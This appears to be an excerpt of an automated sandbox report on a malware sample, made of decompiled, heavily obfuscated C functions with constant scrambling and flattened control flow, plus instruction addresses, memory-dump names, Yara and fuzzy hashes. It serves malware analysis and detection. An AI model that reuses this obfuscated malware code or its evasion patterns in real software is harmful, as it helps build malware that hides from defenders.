                                                                                                                      0x0034c957
                                                                                                                      0x0034c95e
                                                                                                                      0x0034c965
                                                                                                                      0x0034c96c
                                                                                                                      0x0034c970
                                                                                                                      0x0034c977
                                                                                                                      0x0034c97e
                                                                                                                      0x0034c981
                                                                                                                      0x0034c988
                                                                                                                      0x0034c98f
                                                                                                                      0x0034c996
                                                                                                                      0x0034c99d
                                                                                                                      0x0034c9a4
                                                                                                                      0x0034c9ab
                                                                                                                      0x0034c9b6
                                                                                                                      0x0034c9b9
                                                                                                                      0x0034c9ca
                                                                                                                      0x0034c9ca
                                                                                                                      0x0034c9ce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034c9c4
                                                                                                                      0x0034c9d2
                                                                                                                      0x0034c9c6
                                                                                                                      0x0034c9c6
                                                                                                                      0x0034c9c8
                                                                                                                      0x0034c9c9
                                                                                                                      0x00000000
                                                                                                                      0x0034c9c9
                                                                                                                      0x0034c9d5
                                                                                                                      0x0034c9e5
                                                                                                                      0x0034c9ea
                                                                                                                      0x0034c9f0
                                                                                                                      0x0034ca0f
                                                                                                                      0x0034ca1b
                                                                                                                      0x0034ca20
                                                                                                                      0x0034ca2a
                                                                                                                      0x0034ca2f
                                                                                                                      0x0034ca32
                                                                                                                      0x00000000
                                                                                                                      0x0034ca3a
                                                                                                                      0x0034ca02
                                                                                                                      0x0034ca07
                                                                                                                      0x0034ca0d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034ca42
                                                                                                                      0x0034ca42
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: 2f224b6fd2be6839c59b1b6c09314086438347dcdca42158eccd155a983bc063
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: AD514431C0121EEBCF4ACFA5D94A6EEFBB1FB44318F208159D511BA260D7B51A09CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034B821 Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0034B821() {
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t108;
				intOrPtr _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				intOrPtr* _t116;
				void* _t117;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v40;
				_v8 = 0x113b84;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00044f92;
				_v36 = 0x188bc5;
				_v36 = _v36 * 0x48;
				_v36 = _v36 + 0xffff17a0;
				_t129 = 0x184d0e0;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x33821a89;
				_v28 = 0x501440;
				_v28 = _v28 + 0x91aa;
				_v28 = _v28 ^ 0x04b9c112;
				_v28 = _v28 ^ 0x04ea9889;
				_v32 = 0xb3d9a7;
				_t113 = 0x1d;
				_v32 = _v32 * 0x13;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x86e7717c;
				_v40 = 0x7a3277;
				_t30 =  &_v40; // 0x7a3277
				_v40 =  *_t30 * 0x26;
				_v40 = _v40 + 0x92c7;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x89042107;
				_v12 = 0xe6e512;
				_v12 = _v12 / _t113;
				_v12 = _v12 ^ 0x0000e0e8;
				_v16 = 0xf852d4;
				_t114 = 0x7e;
				_v16 = _v16 / _t114;
				_v16 = _v16 ^ 0x2a7b237e;
				_v16 = _v16 ^ 0x2a71b8af;
				_v20 = 0xa37a15;
				_v20 = _v20 + 0xffff21a5;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x000b71fe;
				_v4 = 0x3aba4b;
				_v4 = _v4 ^ 0x2eee7843;
				_v4 = _v4 ^ 0x2ed9fad0;
				_v24 = 0x4dcf39;
				_t115 = 0x4a;
				_v24 = _v24 / _t115;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x434ce119;
				_t116 =  *0x365208; // 0x0
				do {
					while(_t129 != 0x184d0e0) {
						if(_t129 == 0x7e35d81) {
							_t108 = E00354EFF(E003599AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
							_t116 =  *0x365208; // 0x0
							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
						} else {
							if(_t129 != 0xb90d6f1) {
								goto L6;
							} else {
								_push(_v12);
								_push(_v40);
								_t111 = E003511FC(_v32);
								_t116 =  *0x365208; // 0x0
								_t131 = _t131 - 0xc + 0x14;
								_t129 = 0x7e35d81;
								 *_t116 = _t111;
								continue;
							}
						}
						L9:
						return 0 | _t116 != 0x00000000;
					}
					_push(_t116);
					_push(_t116);
					_t117 = 0x18;
					_t116 = E00353512(_t117);
					_t129 = 0xb90d6f1;
					 *0x365208 = _t116;
					L6:
				} while (_t129 != 0x93e05db);
				goto L9;
			}






















                                                                                                                      0x0034b821
                                                                                                                      0x0034b824
                                                                                                                      0x0034b82e
                                                                                                                      0x0034b833
                                                                                                                      0x0034b83b
                                                                                                                      0x0034b84c
                                                                                                                      0x0034b855
                                                                                                                      0x0034b85d
                                                                                                                      0x0034b85f
                                                                                                                      0x0034b869
                                                                                                                      0x0034b876
                                                                                                                      0x0034b87e
                                                                                                                      0x0034b886
                                                                                                                      0x0034b88e
                                                                                                                      0x0034b896
                                                                                                                      0x0034b8a5
                                                                                                                      0x0034b8a8
                                                                                                                      0x0034b8b1
                                                                                                                      0x0034b8b5
                                                                                                                      0x0034b8bd
                                                                                                                      0x0034b8c5
                                                                                                                      0x0034b8ca
                                                                                                                      0x0034b8ce
                                                                                                                      0x0034b8d6
                                                                                                                      0x0034b8db
                                                                                                                      0x0034b8e3
                                                                                                                      0x0034b8f3
                                                                                                                      0x0034b8f7
                                                                                                                      0x0034b8ff
                                                                                                                      0x0034b90b
                                                                                                                      0x0034b910
                                                                                                                      0x0034b916
                                                                                                                      0x0034b91e
                                                                                                                      0x0034b926
                                                                                                                      0x0034b92e
                                                                                                                      0x0034b936
                                                                                                                      0x0034b93b
                                                                                                                      0x0034b943
                                                                                                                      0x0034b94b
                                                                                                                      0x0034b953
                                                                                                                      0x0034b95b
                                                                                                                      0x0034b967
                                                                                                                      0x0034b96a
                                                                                                                      0x0034b96e
                                                                                                                      0x0034b973
                                                                                                                      0x0034b97b
                                                                                                                      0x0034b981
                                                                                                                      0x0034b981
                                                                                                                      0x0034b987
                                                                                                                      0x0034b9f6
                                                                                                                      0x0034b9fb
                                                                                                                      0x0034ba04
                                                                                                                      0x0034b989
                                                                                                                      0x0034b98b
                                                                                                                      0x00000000
                                                                                                                      0x0034b98d
                                                                                                                      0x0034b98d
                                                                                                                      0x0034b991
                                                                                                                      0x0034b99c
                                                                                                                      0x0034b9a1
                                                                                                                      0x0034b9a7
                                                                                                                      0x0034b9aa
                                                                                                                      0x0034b9ac
                                                                                                                      0x00000000
                                                                                                                      0x0034b9ac
                                                                                                                      0x0034b98b
                                                                                                                      0x0034ba08
                                                                                                                      0x0034ba15
                                                                                                                      0x0034ba15
                                                                                                                      0x0034b9bc
                                                                                                                      0x0034b9bd
                                                                                                                      0x0034b9c0
                                                                                                                      0x0034b9c8
                                                                                                                      0x0034b9ca
                                                                                                                      0x0034b9cc
                                                                                                                      0x0034b9d2
                                                                                                                      0x0034b9d2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: 89c6ce039be4841321af886fe763bd97d904570206a5f6037281494c4f3ffd6a
                                                                                                                      • Instruction ID: 737b0b9721596b136c82894bc0f4b1cfc6ac0a4b7160fa3b6928a517617405cc
                                                                                                                      • Opcode Fuzzy Hash: 89c6ce039be4841321af886fe763bd97d904570206a5f6037281494c4f3ffd6a
                                                                                                                      • Instruction Fuzzy Hash: 975189715083419FC309DF29E88A80BFBE5FBC8758F008A1DF595AA260D371DA498F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034AE9A Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0034AE9A() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				void* _t93;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				intOrPtr _t109;
				signed int* _t111;

				_t111 =  &_v364;
				_v332 = 0xbc8cfe;
				_t109 = 0;
				_t93 = 0x544b857;
				_v328 = 0;
				_v324 = 0;
				_v348 = 0xa18708;
				_v348 = _v348 | 0xdf6aec5f;
				_v348 = _v348 ^ 0xdfe83fdc;
				_v356 = 0xddc275;
				_v356 = _v356 + 0xef66;
				_t105 = 0x44;
				_v356 = _v356 / _t105;
				_v356 = _v356 ^ 0x000c07d0;
				_v360 = 0xb33a69;
				_v360 = _v360 + 0x311b;
				_v360 = _v360 + 0xffff8b8d;
				_v360 = _v360 ^ 0x00b7daa7;
				_v364 = 0x70c027;
				_t106 = 0x45;
				_v364 = _v364 / _t106;
				_v364 = _v364 >> 3;
				_t107 = 0x76;
				_v364 = _v364 / _t107;
				_v364 = _v364 ^ 0x00047190;
				_v340 = 0xefeeea;
				_v340 = _v340 >> 9;
				_v340 = _v340 ^ 0x00027f77;
				_v352 = 0xde5c51;
				_v352 = _v352 + 0xffff1c5e;
				_v352 = _v352 ^ 0x00dc38de;
				_v344 = 0x59a1b5;
				_v344 = _v344 + 0xf1eb;
				_v344 = _v344 ^ 0x005dc95d;
				_v336 = 0x74ce3f;
				_v336 = _v336 + 0xffffdac0;
				_v336 = _v336 ^ 0x0079bed4;
				do {
					while(_t93 != 0x136692) {
						if(_t93 == 0x147bc0f) {
							_t93 = 0xf967eb2;
							_t109 = _t109 + _v276 * 0x64;
							continue;
						} else {
							if(_t93 == 0x544b857) {
								_t93 = 0x136692;
								continue;
							} else {
								if(_t93 == 0x6e5561d) {
									_t93 = 0xde10965;
									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
									continue;
								} else {
									if(_t93 == 0x9c7e626) {
										E00343D8A(_v340,  &_v320, _v352, _v344, _v336);
										_t111 =  &(_t111[3]);
										_t93 = 0x6e5561d;
										continue;
									} else {
										if(_t93 == 0xde10965) {
											_t93 = 0x147bc0f;
											_t109 = _t109 + _v280 * 0x3e8;
											continue;
										} else {
											if(_t93 != 0xf967eb2) {
												goto L16;
											} else {
												_t109 = _t109 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t109;
					}
					_v284 = 0x11c;
					E00355A5C( &_v284, _v348, _v356, _v360, _v364);
					_t111 =  &(_t111[3]);
					_t93 = 0x9c7e626;
					L16:
				} while (_t93 != 0xf3c44c2);
				goto L9;
			}

























                                                                                                                      0x0034ae9a
                                                                                                                      0x0034aea0
                                                                                                                      0x0034aead
                                                                                                                      0x0034aeaf
                                                                                                                      0x0034aeb4
                                                                                                                      0x0034aebd
                                                                                                                      0x0034aec6
                                                                                                                      0x0034aece
                                                                                                                      0x0034aed6
                                                                                                                      0x0034aede
                                                                                                                      0x0034aee6
                                                                                                                      0x0034aef5
                                                                                                                      0x0034aefa
                                                                                                                      0x0034af00
                                                                                                                      0x0034af08
                                                                                                                      0x0034af10
                                                                                                                      0x0034af18
                                                                                                                      0x0034af20
                                                                                                                      0x0034af28
                                                                                                                      0x0034af34
                                                                                                                      0x0034af39
                                                                                                                      0x0034af3f
                                                                                                                      0x0034af48
                                                                                                                      0x0034af50
                                                                                                                      0x0034af54
                                                                                                                      0x0034af5c
                                                                                                                      0x0034af64
                                                                                                                      0x0034af69
                                                                                                                      0x0034af71
                                                                                                                      0x0034af79
                                                                                                                      0x0034af81
                                                                                                                      0x0034af89
                                                                                                                      0x0034af91
                                                                                                                      0x0034af99
                                                                                                                      0x0034afa1
                                                                                                                      0x0034afa9
                                                                                                                      0x0034afb1
                                                                                                                      0x0034afb9
                                                                                                                      0x0034afb9
                                                                                                                      0x0034afc3
                                                                                                                      0x0034b05c
                                                                                                                      0x0034b05e
                                                                                                                      0x00000000
                                                                                                                      0x0034afc9
                                                                                                                      0x0034afcf
                                                                                                                      0x0034b050
                                                                                                                      0x00000000
                                                                                                                      0x0034afd1
                                                                                                                      0x0034afd7
                                                                                                                      0x0034b03e
                                                                                                                      0x0034b049
                                                                                                                      0x00000000
                                                                                                                      0x0034afd9
                                                                                                                      0x0034afdf
                                                                                                                      0x0034b027
                                                                                                                      0x0034b02c
                                                                                                                      0x0034b02f
                                                                                                                      0x00000000
                                                                                                                      0x0034afe1
                                                                                                                      0x0034afe7
                                                                                                                      0x0034b00d
                                                                                                                      0x0034b00f
                                                                                                                      0x00000000
                                                                                                                      0x0034afe9
                                                                                                                      0x0034afeb
                                                                                                                      0x00000000
                                                                                                                      0x0034aff1
                                                                                                                      0x0034aff6
                                                                                                                      0x0034aff6
                                                                                                                      0x0034afeb
                                                                                                                      0x0034afe7
                                                                                                                      0x0034afdf
                                                                                                                      0x0034afd7
                                                                                                                      0x0034afcf
                                                                                                                      0x0034aff9
                                                                                                                      0x0034b004
                                                                                                                      0x0034b004
                                                                                                                      0x0034b06d
                                                                                                                      0x0034b081
                                                                                                                      0x0034b086
                                                                                                                      0x0034b089
                                                                                                                      0x0034b08e
                                                                                                                      0x0034b08e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: faa15daccf0cf597caf2021bd9d4e24205151455e6a0ef42e528f3a41c45fb4c
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction Fuzzy Hash: B441A8B16083028BC719CE15D99546FFAE1EBD4708F148A2EF59A5A260D3B4DA0DCF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00346C29 Relevance: 3.8, Strings: 3, Instructions: 94COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00346C29() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v44;
				intOrPtr _v48;
				void* _t89;
				intOrPtr _t98;
				signed int _t102;
				signed int _t103;
				void* _t105;

				_v48 = 0xcb88bc;
				asm("stosd");
				_t102 = 0x47;
				asm("stosd");
				_t89 = 0xf0122cf;
				asm("stosd");
				_v16 = 0x79c750;
				_v16 = _v16 + 0x2192;
				_v16 = _v16 ^ 0x37fffb71;
				_v16 = _v16 + 0xffff9df1;
				_v16 = _v16 ^ 0x3784de23;
				_v12 = 0x72aa7c;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 + 0x37d5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x02292cf3;
				_v8 = 0x96e633;
				_v8 = _v8 ^ 0x4b98ff22;
				_v8 = _v8 ^ 0x9d1458e0;
				_v8 = _v8 | 0xdef8ea17;
				_v8 = _v8 ^ 0xdef824a2;
				_v28 = 0x117d;
				_v28 = _v28 / _t102;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00058012;
				_v24 = 0x3d67df;
				_v24 = _v24 | 0x442c4c66;
				_t44 =  &_v24; // 0x442c4c66
				_t103 = 0x76;
				_v24 =  *_t44 / _t103;
				_v24 = _v24 ^ 0x009d94f1;
				_v32 = 0x4e376f;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0xc6ef13b7;
				_v20 = 0x3e602c;
				_v20 = _v20 ^ 0x8d0d4ca7;
				_v20 = _v20 << 6;
				_v20 = _v20 * 0x6d;
				_v20 = _v20 ^ 0xb2734839;
				do {
					while(_t89 != 0x600d2ee) {
						if(_t89 == 0xf0122cf) {
							_push(_t89);
							_push(_t89);
							 *0x365210 = E00353512(0x138);
							_t89 = 0x600d2ee;
							continue;
						}
						goto L5;
					}
					_t98 =  *0x365210; // 0x0
					E0035A156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
					_t105 = _t105 + 0xc;
					_t89 = 0x7d77246;
					L5:
				} while (_t89 != 0x7d77246);
				return 1;
			}

















                                                                                                                      0x00346c2f
                                                                                                                      0x00346c40
                                                                                                                      0x00346c48
                                                                                                                      0x00346c4b
                                                                                                                      0x00346c4c
                                                                                                                      0x00346c4e
                                                                                                                      0x00346c4f
                                                                                                                      0x00346c5b
                                                                                                                      0x00346c62
                                                                                                                      0x00346c69
                                                                                                                      0x00346c70
                                                                                                                      0x00346c77
                                                                                                                      0x00346c82
                                                                                                                      0x00346c85
                                                                                                                      0x00346c8c
                                                                                                                      0x00346c90
                                                                                                                      0x00346c97
                                                                                                                      0x00346c9e
                                                                                                                      0x00346ca5
                                                                                                                      0x00346cac
                                                                                                                      0x00346cb3
                                                                                                                      0x00346cba
                                                                                                                      0x00346cc8
                                                                                                                      0x00346ccb
                                                                                                                      0x00346ccf
                                                                                                                      0x00346cd6
                                                                                                                      0x00346cdd
                                                                                                                      0x00346ce4
                                                                                                                      0x00346ce7
                                                                                                                      0x00346cef
                                                                                                                      0x00346cf2
                                                                                                                      0x00346cf9
                                                                                                                      0x00346d00
                                                                                                                      0x00346d04
                                                                                                                      0x00346d0b
                                                                                                                      0x00346d12
                                                                                                                      0x00346d19
                                                                                                                      0x00346d21
                                                                                                                      0x00346d24
                                                                                                                      0x00346d2b
                                                                                                                      0x00346d2b
                                                                                                                      0x00346d31
                                                                                                                      0x00346d3c
                                                                                                                      0x00346d3d
                                                                                                                      0x00346d4a
                                                                                                                      0x00346d4f
                                                                                                                      0x00000000
                                                                                                                      0x00346d4f
                                                                                                                      0x00000000
                                                                                                                      0x00346d31
                                                                                                                      0x00346d5c
                                                                                                                      0x00346d68
                                                                                                                      0x00346d6d
                                                                                                                      0x00346d70
                                                                                                                      0x00346d72
                                                                                                                      0x00346d72
                                                                                                                      0x00346d7f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: a796a650282fe167710ca134a337936592ae9b98c046e5dd4150a3e529b72f29
                                                                                                                      • Instruction ID: fe2b261cd0733e7d749d826f4c6b60f620c6177f3d4ea993b179ff93364da052
                                                                                                                      • Opcode Fuzzy Hash: a796a650282fe167710ca134a337936592ae9b98c046e5dd4150a3e529b72f29
                                                                                                                      • Instruction Fuzzy Hash: 934147B1E0020AEBDF49CFA4D9864EEBBB1FF45314F208559D512A7260E3B45B45CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00346ED6 Relevance: 3.8, Strings: 3, Instructions: 88COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00346ED6(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t87;
				void* _t89;
				intOrPtr* _t90;
				signed int _t93;
				intOrPtr _t104;

				_v48 = 0x387a4d;
				_v44 = 0;
				_v40 = 0;
				_v24 = 0x2424c8;
				_v24 = _v24 ^ 0x2613c361;
				_t93 = 0x67;
				_t104 = _a4;
				_v24 = _v24 * 0x39;
				_v24 = _v24 ^ 0x8272caac;
				_v8 = 0x1db7b6;
				_v8 = _v8 * 0x22;
				_v8 = _v8 + 0xffff08c1;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x7e2ce57a;
				_v32 = 0xc3f5b3;
				_v32 = _v32 * 0x7f;
				_v32 = _v32 ^ 0x61389900;
				_v12 = 0x2d74a5;
				_v12 = _v12 / _t93;
				_v12 = _v12 + 0xffffbd08;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0x0019f3c3;
				_v28 = 0x7d8734;
				_v28 = _v28 >> 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x000207bd;
				_v20 = 0x79f3b3;
				_v20 = _v20 | 0xe743018d;
				_v20 = _v20 + 0xb3b6;
				_v20 = _v20 + 0x51ad;
				_v20 = _v20 ^ 0xe775faa1;
				_v36 = 0x6d6a5a;
				_v36 = _v36 << 0xd;
				_v36 = _v36 ^ 0xad48a6bc;
				_v16 = 0x62a4bc;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 0xa;
				_v16 = _v16 * 0x38;
				_v16 = _v16 ^ 0xac926db4;
				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
				_t109 = _t87;
				if(_t87 != 0) {
					_push(0x34188c);
					_push(_v32);
					_t72 =  &_v8; // 0x7e2ce57a
					_t89 = E0034BB4B(_v24,  *_t72, _t109);
					_push( *((intOrPtr*)(_t104 + 0x30)));
					_t106 = _t89;
					_push(_v28);
					_t90 = E00359861(_v12, _t89);
					if(_t90 != 0) {
						 *_t90();
					}
					E0034AE03(_v20, _v36, _v16, _t106);
				}
				return 0;
			}



















                                                                                                                      0x00346edc
                                                                                                                      0x00346ee8
                                                                                                                      0x00346eeb
                                                                                                                      0x00346eee
                                                                                                                      0x00346ef5
                                                                                                                      0x00346f03
                                                                                                                      0x00346f04
                                                                                                                      0x00346f07
                                                                                                                      0x00346f0a
                                                                                                                      0x00346f11
                                                                                                                      0x00346f1f
                                                                                                                      0x00346f22
                                                                                                                      0x00346f29
                                                                                                                      0x00346f2d
                                                                                                                      0x00346f34
                                                                                                                      0x00346f3f
                                                                                                                      0x00346f42
                                                                                                                      0x00346f49
                                                                                                                      0x00346f55
                                                                                                                      0x00346f58
                                                                                                                      0x00346f63
                                                                                                                      0x00346f66
                                                                                                                      0x00346f6d
                                                                                                                      0x00346f74
                                                                                                                      0x00346f78
                                                                                                                      0x00346f7b
                                                                                                                      0x00346f82
                                                                                                                      0x00346f89
                                                                                                                      0x00346f90
                                                                                                                      0x00346f97
                                                                                                                      0x00346f9e
                                                                                                                      0x00346fa5
                                                                                                                      0x00346fac
                                                                                                                      0x00346fb0
                                                                                                                      0x00346fb7
                                                                                                                      0x00346fbe
                                                                                                                      0x00346fc2
                                                                                                                      0x00346fca
                                                                                                                      0x00346fcd
                                                                                                                      0x00346fd7
                                                                                                                      0x00346fda
                                                                                                                      0x00346fdc
                                                                                                                      0x00346fde
                                                                                                                      0x00346fe3
                                                                                                                      0x00346fe6
                                                                                                                      0x00346fec
                                                                                                                      0x00346ff1
                                                                                                                      0x00346ff4
                                                                                                                      0x00346ff6
                                                                                                                      0x00346ffe
                                                                                                                      0x00347008
                                                                                                                      0x0034700a
                                                                                                                      0x0034700a
                                                                                                                      0x00347016
                                                                                                                      0x0034701c
                                                                                                                      0x00347024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: 93148ac4cff036bdf7f7595af45494adce609ee81f9257f73854ac39d9ca41d1
                                                                                                                      • Instruction ID: 2c096251c001b55268337ee9e146ffbd42c2107f68fd5a9c34bc4d0d61825ac9
                                                                                                                      • Opcode Fuzzy Hash: 93148ac4cff036bdf7f7595af45494adce609ee81f9257f73854ac39d9ca41d1
                                                                                                                      • Instruction Fuzzy Hash: 06410F71D0131AABCF09CFA1C98A8EEBBB1FB44314F20815AD821B6250D7B95B55CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00363672 Relevance: 3.8, Strings: 3, Instructions: 54COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00363672() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _t69;
				intOrPtr _t71;

				_v16 = 0x1920f4;
				_v16 = _v16 | 0xcc0e70e0;
				_v16 = _v16 + 0xffff67e9;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00056687;
				_v12 = 0xe97d2f;
				_v12 = _v12 * 5;
				_v12 = _v12 + 0xdb12;
				_v12 = _v12 ^ 0x6ef3d177;
				_v12 = _v12 ^ 0x6a6f4e7b;
				_v8 = 0xee58e5;
				_v8 = _v8 + 0xffff20e4;
				_v8 = _v8 + 0x2db7;
				_v8 = _v8 + 0xffff706b;
				_v8 = _v8 ^ 0x00e27cba;
				_v24 = 0x674fea;
				_v24 = _v24 << 0xd;
				_v24 = _v24 << 0xe;
				_v24 = _v24 + 0xffff2a40;
				_v24 = _v24 ^ 0x4ff265ad;
				_v32 = 0x2c6dbe;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x000c65e7;
				_v20 = 0xd3ac82;
				_v20 = _v20 * 0x77;
				_v20 = _v20 << 0xc;
				_v20 = _v20 + 0x1c1c;
				_v20 = _v20 ^ 0x53000be4;
				_v28 = 0xd3eaf5;
				_v28 = _v28 ^ 0xd0f82d1e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x57832eb1;
				_t69 =  *0x365c9c; // 0x0
				E0035E884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
				_t71 =  *0x365c9c; // 0x0
				return E003468DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
			}












                                                                                                                      0x00363678
                                                                                                                      0x0036367f
                                                                                                                      0x00363686
                                                                                                                      0x0036368d
                                                                                                                      0x00363691
                                                                                                                      0x00363698
                                                                                                                      0x003636a3
                                                                                                                      0x003636a6
                                                                                                                      0x003636ad
                                                                                                                      0x003636b4
                                                                                                                      0x003636bb
                                                                                                                      0x003636c2
                                                                                                                      0x003636c9
                                                                                                                      0x003636d0
